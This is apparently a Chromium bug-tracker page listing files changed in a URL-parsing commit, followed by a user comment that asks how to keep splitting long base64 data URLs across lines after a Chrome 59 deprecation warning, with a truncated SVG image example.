[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/Source/core/loader/FrameLoader.cpp
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/Source/platform/weborigin/KURL.h
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/third_party/WebKit/Source/platform/weborigin/KURLTest.cpp
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/url/gurl_unittest.cc
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/url/third_party/mozilla/url_parse.cc
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/url/third_party/mozilla/url_parse.h
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/url/url_canon.h
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/url/url_canon_etc.cc
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/url/url_canon_relative.cc
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/url/url_util.cc
[modify] https://crrev.com/9e5ae901660de47ef1b844c6113eae91b5ae8e9e/url/url_util_unittest.cc

Comment 13 by antlafra...@gmail.com, Jun 23 (3 days ago)
I got the deprecation warning in Chrome 59. So in the future it wont be possible to split long base64 urls?
Are there alternatives to avoid writing very long code lines?
Thanks

Example:
<image xlink:href="data:image/jpeg;base64,/9j/4QAYRXhpZgAASUkqAAgAAAAAAAAAAAAAAP/
sABFEdWNreQABAAQAAAALAAD/4QM0aHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wLwA8P3hwYWNrZXQg
YmVnaW49Iu+7vyIgaWQ9Ilc1TTBNcENlaGlIenJlU3pOVGN6a2M5ZCI/PiA8eDp4bXBtZXRhIHhtbG5zO
ng9ImFkb2JlOm5zOm1ldGEvIiB4OnhtcHRrPSJBZG9iZSBYTVAgQ29yZSA1LjMtYzAxMSA2Ni4xNDU2Nj
EsIDIwMTIvMDIvMDYtMTQ6NTY6MjcgICAgICAgIC...(some thousands more characters)"/>
Sign in to add a comment